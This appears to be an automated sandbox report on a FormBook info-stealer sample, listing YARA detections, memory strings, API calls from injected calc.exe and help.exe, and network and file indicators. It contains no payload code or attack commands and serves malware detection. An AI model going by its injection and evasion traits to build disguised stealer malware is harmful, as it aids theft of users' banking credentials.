          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49711 version: TLS 1.2

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Very long command line foundShow sources
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: Commandline size = 4201
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: Commandline size = 4201Jump to behavior
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00419D50 NtCreateFile,9_2_00419D50
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00419E00 NtReadFile,9_2_00419E00
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00419E80 NtClose,9_2_00419E80
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00419F30 NtAllocateVirtualMemory,9_2_00419F30
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00419D4B NtCreateFile,9_2_00419D4B
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00419DFB NtReadFile,9_2_00419DFB
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00419E4A NtClose,9_2_00419E4A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00419E7A NtClose,9_2_00419E7A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9A20 NtResumeThread,LdrInitializeThunk,9_2_033E9A20
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9A00 NtProtectVirtualMemory,LdrInitializeThunk,9_2_033E9A00
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9A50 NtCreateFile,LdrInitializeThunk,9_2_033E9A50
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_033E9910
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E99A0 NtCreateSection,LdrInitializeThunk,9_2_033E99A0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9860 NtQuerySystemInformation,LdrInitializeThunk,9_2_033E9860
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9840 NtDelayExecution,LdrInitializeThunk,9_2_033E9840
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E98F0 NtReadVirtualMemory,LdrInitializeThunk,9_2_033E98F0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9710 NtQueryInformationToken,LdrInitializeThunk,9_2_033E9710
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E97A0 NtUnmapViewOfSection,LdrInitializeThunk,9_2_033E97A0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9780 NtMapViewOfSection,LdrInitializeThunk,9_2_033E9780
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9660 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_033E9660
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E96E0 NtFreeVirtualMemory,LdrInitializeThunk,9_2_033E96E0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9540 NtReadFile,LdrInitializeThunk,9_2_033E9540
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E95D0 NtClose,LdrInitializeThunk,9_2_033E95D0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9B00 NtSetValueKey,9_2_033E9B00
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033EA3B0 NtGetContextThread,9_2_033EA3B0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9A10 NtQuerySection,9_2_033E9A10
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9A80 NtOpenDirectoryObject,9_2_033E9A80
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9950 NtQueueApcThread,9_2_033E9950
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E99D0 NtCreateProcessEx,9_2_033E99D0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9820 NtEnumerateKey,9_2_033E9820
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033EB040 NtSuspendThread,9_2_033EB040
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E98A0 NtWriteVirtualMemory,9_2_033E98A0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9730 NtQueryVirtualMemory,9_2_033E9730
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033EA710 NtOpenProcessToken,9_2_033EA710
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9770 NtSetInformationFile,9_2_033E9770
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033EA770 NtOpenThread,9_2_033EA770
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9760 NtOpenProcess,9_2_033E9760
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9FE0 NtCreateMutant,9_2_033E9FE0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9610 NtEnumerateValueKey,9_2_033E9610
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9670 NtQueryInformationProcess,9_2_033E9670
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9650 NtQueryValueKey,9_2_033E9650
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E96D0 NtCreateKey,9_2_033E96D0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033EAD30 NtSetContextThread,9_2_033EAD30
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9520 NtWaitForSingleObject,9_2_033E9520
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9560 NtWriteFile,9_2_033E9560
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E95F0 NtQueryInformationFile,9_2_033E95F0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC96E0 NtFreeVirtualMemory,LdrInitializeThunk,19_2_02AC96E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC96D0 NtCreateKey,LdrInitializeThunk,19_2_02AC96D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9660 NtAllocateVirtualMemory,LdrInitializeThunk,19_2_02AC9660
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9650 NtQueryValueKey,LdrInitializeThunk,19_2_02AC9650
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9A50 NtCreateFile,LdrInitializeThunk,19_2_02AC9A50
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9780 NtMapViewOfSection,LdrInitializeThunk,19_2_02AC9780
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9FE0 NtCreateMutant,LdrInitializeThunk,19_2_02AC9FE0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9710 NtQueryInformationToken,LdrInitializeThunk,19_2_02AC9710
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9860 NtQuerySystemInformation,LdrInitializeThunk,19_2_02AC9860
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9840 NtDelayExecution,LdrInitializeThunk,19_2_02AC9840
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC99A0 NtCreateSection,LdrInitializeThunk,19_2_02AC99A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC95D0 NtClose,LdrInitializeThunk,19_2_02AC95D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,19_2_02AC9910
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9540 NtReadFile,LdrInitializeThunk,19_2_02AC9540
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9A80 NtOpenDirectoryObject,19_2_02AC9A80
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9A20 NtResumeThread,19_2_02AC9A20
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9A00 NtProtectVirtualMemory,19_2_02AC9A00
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9610 NtEnumerateValueKey,19_2_02AC9610
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9A10 NtQuerySection,19_2_02AC9A10
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9670 NtQueryInformationProcess,19_2_02AC9670
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC97A0 NtUnmapViewOfSection,19_2_02AC97A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ACA3B0 NtGetContextThread,19_2_02ACA3B0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9730 NtQueryVirtualMemory,19_2_02AC9730
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9B00 NtSetValueKey,19_2_02AC9B00
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ACA710 NtOpenProcessToken,19_2_02ACA710
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9760 NtOpenProcess,19_2_02AC9760
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9770 NtSetInformationFile,19_2_02AC9770
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ACA770 NtOpenThread,19_2_02ACA770
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC98A0 NtWriteVirtualMemory,19_2_02AC98A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC98F0 NtReadVirtualMemory,19_2_02AC98F0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9820 NtEnumerateKey,19_2_02AC9820
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ACB040 NtSuspendThread,19_2_02ACB040
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC95F0 NtQueryInformationFile,19_2_02AC95F0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC99D0 NtCreateProcessEx,19_2_02AC99D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9520 NtWaitForSingleObject,19_2_02AC9520
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ACAD30 NtSetContextThread,19_2_02ACAD30
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9560 NtWriteFile,19_2_02AC9560
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9950 NtQueueApcThread,19_2_02AC9950
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001B9D50 NtCreateFile,19_2_001B9D50
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001B9E00 NtReadFile,19_2_001B9E00
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001B9E80 NtClose,19_2_001B9E80
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001B9F30 NtAllocateVirtualMemory,19_2_001B9F30
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001B9D4B NtCreateFile,19_2_001B9D4B
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001B9DFB NtReadFile,19_2_001B9DFB
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001B9E4A NtClose,19_2_001B9E4A
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001B9E7A NtClose,19_2_001B9E7A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0041D84E9_2_0041D84E
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0041E0669_2_0041E066
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_004010309_2_00401030
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0041E94D9_2_0041E94D
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0041D1F19_2_0041D1F1
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0041DA239_2_0041DA23
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0041DB369_2_0041DB36
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00402D899_2_00402D89
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00402D909_2_00402D90
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0041BE229_2_0041BE22
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00409E309_2_00409E30
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00402FB09_2_00402FB0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03472B289_2_03472B28
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DEBB09_2_033DEBB0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034722AE9_2_034722AE
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033C41209_2_033C4120
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AF9009_2_033AF900
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034610029_2_03461002
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D20A09_2_033D20A0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033BB0909_2_033BB090
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034720A89_2_034720A8
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03471FF19_2_03471FF1
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033C6E309_2_033C6E30
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03472EF79_2_03472EF7
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03471D559_2_03471D55
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A0D209_2_033A0D20
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03472D079_2_03472D07
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D25819_2_033D2581
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033BD5E09_2_033BD5E0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B841F9_2_033B841F
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA6E3019_2_02AA6E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABEBB019_2_02ABEBB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9B09019_2_02A9B090
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B4100219_2_02B41002
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9841F19_2_02A9841F
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9D5E019_2_02A9D5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A80D2019_2_02A80D20
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA412019_2_02AA4120
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8F90019_2_02A8F900
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B51D5519_2_02B51D55
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001BD84E19_2_001BD84E
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001BE06619_2_001BE066
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001BE94D19_2_001BE94D
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001BDA2319_2_001BDA23
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001BDB3619_2_001BDB36
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001A2D9019_2_001A2D90
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001A2D8919_2_001A2D89
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001A9E3019_2_001A9E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001BBE2219_2_001BBE22
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001A2FB019_2_001A2FB0
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 033AB150 appears 35 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 02A8B150 appears 32 times
          Source: s2rsXUiUn8.exeStatic PE information: Number of sections : 11 > 10
          Source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/6@5/2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20210722Jump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5436:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3084:120:WilError_01
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1pghm4uj.4m1.ps1Jump to behavior
